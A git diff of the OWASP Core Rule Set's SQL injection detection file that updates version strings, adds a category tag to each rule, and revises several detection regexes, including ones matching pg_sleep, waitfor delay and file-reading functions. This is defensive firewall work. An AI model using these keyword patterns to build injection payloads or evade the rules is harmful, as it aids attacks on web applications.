 #
diff --git a/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf b/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
index 9957ea6bb..74da9abb7 100644
--- a/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
+++ b/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -14,8 +14,8 @@
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -57,9 +57,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
@@ -88,9 +89,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -107,7 +109,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 942151
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:cii(?:str)?|in)|tan2?)|b(?:enchmark|i(?:n_to_num|t_(?:and|count|length|x?or)))|c(?:har(?:acter)?_length|iel(?:ing)?|o(?:alesce|ercibility|llation|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|t)|r32|ur(?:(?:dat|tim)e|rent_(?:date|setting|time(?:stamp)?|user)))|d(?:a(?:t(?:abase(?:_to_xml)?|e(?:_(?:add|format|sub)|diff))|y(?:name|of(?:month|week|year)))|count|e(?:code|grees|s_(?:de|en)crypt)|ump)|e(?:lt|n(?:c(?:ode|rypt)|ds_?with)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:el|n)d_in_set|ound_rows|rom_(?:base64|days|unixtime))|g(?:e(?:ometrycollection|t(?:_(?:format|lock)|pgusername))|(?:r(?:eates|oup_conca)|tid_subse)t)|hex(?:toraw)?|i(?:fnull|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|superuser)|null))|json(?:_(?:a(?:gg|rray(?:_(?:elements(?:_text)?|length))?)|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|object(?:_(?:agg|keys))?|populate_record(?:set)?|strip_nulls|t(?:o_record(?:set)?|ypeof))|b(?:_(?:array(?:_(?:elements(?:_text)?|length))?|build_(?:array|object)|object(?:_(?:agg|keys))?|e(?:ac|xtract_pat)h(?:_text)?|insert|p(?:ath_(?:(?:exists|match)(?:_tz)?|query(?:_(?:(?:array|first)(?:_tz)?|tz))?)|opulate_record(?:set)?|retty)|s(?:et(?:_lax)?|trip_nulls)|t(?:o_record(?:set)?|ypeof)))?|path)?|l(?:ast_(?:day|inser_id)|case|e(?:as|f)t|i(?:kel(?:ihood|y)|nestring)|o(?:_(?:from_bytea|put)|ad_file|ca(?:ltimestamp|te)|g(?:10|2)|wer)|pad|trim)|m(?:a(?:ke(?:_set|date)|ster_pos_wait)|d5|i(?:crosecon)?d|onthname|ulti(?:linestring|po(?:int|lygon)))|n(?:ame_const|ot_in|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:eriod_(?:add|diff)|g_(?:client_encoding|(?:databas|read_fil)e|l(?:argeobject|s_dir)|sleep|user)|o(?:(?:lyg|siti)on|w)|rocedure_analyse)|qu(?:arter|ery_to_xml|ote)|r(?:a(?:dians|nd|wtohex)|elease_lock|ow_(?:count|to_json)|pad|trim)|s(?:chema|e(?:c_to_time|ssion_user)|ha[12]?|in|oundex|pace|q(?:lite_(?:compileoption_(?:get|used)|source_id)|rt)|t(?:arts_?with|d(?:dev_(?:po|sam)p)?|r(?:_to_date|cmp))|ub(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|ys(?:date|tem_user))|t(?:ime(?:_(?:format|to_sec)|diff|stamp(?:add|diff)?)|o(?:_(?:base64|jsonb?)|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|i(?:str|x_timestamp)|likely)|(?:pdatexm|se_json_nul)l|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|var(?:_(?:po|sam)p|iance)|we(?:ek(?:day|ofyear)|ight_string)|xmltype|yearweek)[^0-9A-Z_a-z]*\(" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:cii(?:str)?|in)|tan2?)|b(?:enchmark|i(?:n_to_num|t_(?:and|count|length|x?or)))|c(?:har(?:acter)?_length|iel(?:ing)?|o(?:alesce|ercibility|llation|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert_tz)?)|t)|r32|ur(?:(?:dat|tim)e|rent_(?:date|setting|time(?:stamp)?|user)))|d(?:a(?:t(?:abase(?:_to_xml)?|e(?:_(?:add|format|sub)|diff))|y(?:name|of(?:month|week|year)))|count|e(?:code|s_(?:de|en)crypt)|ump)|e(?:n(?:c(?:ode|rypt)|ds_?with)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:el|n)d_in_set|ound_rows|rom_(?:base64|days|unixtime))|g(?:e(?:ometrycollection|t(?:_(?:format|lock)|pgusername))|(?:r(?:eates|oup_conca)|tid_subse)t)|hex(?:toraw)?|i(?:fnull|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|superuser)|null))|json(?:_(?:a(?:gg|rray(?:_(?:elements(?:_text)?|length))?)|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|object(?:_(?:agg|keys))?|populate_record(?:set)?|strip_nulls|t(?:o_record(?:set)?|ypeof))|b(?:_(?:array(?:_(?:elements(?:_text)?|length))?|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|insert|object(?:_(?:agg|keys))?|p(?:ath_(?:(?:exists|match)(?:_tz)?|query(?:_(?:(?:array|first)(?:_tz)?|tz))?)|opulate_record(?:set)?|retty)|s(?:et(?:_lax)?|trip_nulls)|t(?:o_record(?:set)?|ypeof)))?|path)?|l(?:ast_(?:day|inser_id)|case|east|i(?:kely|nestring)|o(?:_(?:from_bytea|put)|ad_file|ca(?:ltimestamp|te)|g(?:10|2))|pad|trim)|m(?:a(?:ke(?:_set|date)|ster_pos_wait)|d5|i(?:crosecon)?d|onthname|ulti(?:linestring|po(?:int|lygon)))|n(?:ame_const|ot_in|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:eriod_(?:add|diff)|g_(?:client_encoding|(?:databas|read_fil)e|l(?:argeobject|s_dir)|sleep|user)|o(?:lygon|w)|rocedure_analyse)|qu(?:ery_to_xml|ote)|r(?:a(?:dians|nd|wtohex)|elease_lock|ow_(?:count|to_json)|pad|trim)|s(?:chema|e(?:c_to_time|ssion_user)|ha[12]?|in|oundex|q(?:lite_(?:compileoption_(?:get|used)|source_id)|rt)|t(?:arts_?with|d(?:dev_(?:po|sam)p)?|r(?:_to_date|cmp))|ub(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|ys(?:date|tem_user))|t(?:ime(?:_(?:format|to_sec)|diff|stamp(?:add|diff)?)|o(?:_(?:base64|jsonb?)|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|i(?:str|x_timestamp))|(?:pdatexm|se_json_nul)l|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|var(?:_(?:po|sam)p|iance)|we(?:ek(?:day|ofyear)|ight_string)|xmltype|yearweek)[^0-9A-Z_a-z]*\(" \
     "id:942151,\
     phase:2,\
     block,\
@@ -121,9 +123,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -166,8 +169,9 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -191,9 +195,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -217,9 +222,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -241,9 +247,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -267,9 +274,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -293,9 +301,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -314,9 +323,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -335,9 +345,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -347,7 +358,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 942280
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)select[\s\x0b]*?pg_sleep|waitfor[\s\x0b]*?delay[\s\x0b]?[\"'`]+[\s\x0b]?[0-9]|;[\s\x0b]*?shutdown[\s\x0b]*?(?:[#;\{]|/\*|--)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)select[\s\x0b]*?pg_sleep|waitfor[\s\x0b]*?delay[\s\x0b]?[\"'`]+[\s\x0b]?[0-9]|;[\s\x0b]*?shutdown[\s\x0b]*?(?:[#;\{]|/\*|--)" \
     "id:942280,\
     phase:2,\
     block,\
@@ -361,9 +372,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -387,9 +399,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -416,9 +429,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -442,9 +456,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -481,9 +496,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -522,9 +538,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
@@ -558,10 +575,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'platform-multi',\
     tag:'attack-sqli',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'paranoia-level/1',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -588,9 +606,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -617,16 +636,17 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
     tag:'attack-sqli',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -643,7 +663,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,tag:'O
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 942120
 #
-SecRule ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)!=|&&|\|\||>[=>]|<(?:<|=>?|>(?:[\s\x0b]+binary)?)|\b(?:(?:xor|r(?:egexp|like)|i(?:snull|like)|notnull)\b|collate(?:[^0-9A-Z_a-z]*?(?:U&)?[\"'`]|[^0-9A-Z_a-z]+(?:(?:binary|nocase|rtrim)\b|[0-9A-Z_a-z]*?_))|(?:likel(?:ihood|y)|unlikely)[\s\x0b]*\()|r(?:egexp|like)[\s\x0b]+binary|not[\s\x0b]+between[\s\x0b]+(?:0[\s\x0b]+and|(?:'[^']*'|\"[^\"]*\")[\s\x0b]+and[\s\x0b]+(?:'[^']*'|\"[^\"]*\"))|is[\s\x0b]+null|like[\s\x0b]+(?:null|[0-9A-Z_a-z]+[\s\x0b]+escape\b)|(?:^|[^0-9A-Z_a-z])in[\s\x0b\+]*\([\s\x0b\"0-9]+[^\(\)]*\)|[!<->]{1,2}[\s\x0b]*all\b" \
+SecRule ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[!=]=|&&|\|\||->|>[=>]|<(?:[<=]|>(?:[\s\x0b]+binary)?)|\b(?:(?:xor|r(?:egexp|like)|i(?:snull|like)|notnull)\b|collate(?:[^0-9A-Z_a-z]*?(?:U&)?[\"'`]|[^0-9A-Z_a-z]+(?:(?:binary|nocase|rtrim)\b|[0-9A-Z_a-z]*?_))|(?:likel(?:ihood|y)|unlikely)[\s\x0b]*\()|r(?:egexp|like)[\s\x0b]+binary|not[\s\x0b]+between[\s\x0b]+(?:0[\s\x0b]+and|(?:'[^']*'|\"[^\"]*\")[\s\x0b]+and[\s\x0b]+(?:'[^']*'|\"[^\"]*\"))|is[\s\x0b]+null|like[\s\x0b]+(?:null|[0-9A-Z_a-z]+[\s\x0b]+escape\b)|(?:^|[^0-9A-Z_a-z])in[\s\x0b\+]*\([\s\x0b\"0-9]+[^\(\)]*\)|[!<->][\s\x0b]*all\b" \
     "id:942120,\
     phase:2,\
     block,\
@@ -657,9 +677,10 @@ SecRule ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)!=|&&|\|\||>[=>]|<(?:<|
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -698,9 +719,10 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\x0b\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.942130_matched_var_name=%{matched_var_name}',\
     chain"
@@ -734,9 +756,10 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\x0b\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.942131_matched_var_name=%{matched_var_name}',\
@@ -771,9 +794,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -814,9 +838,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
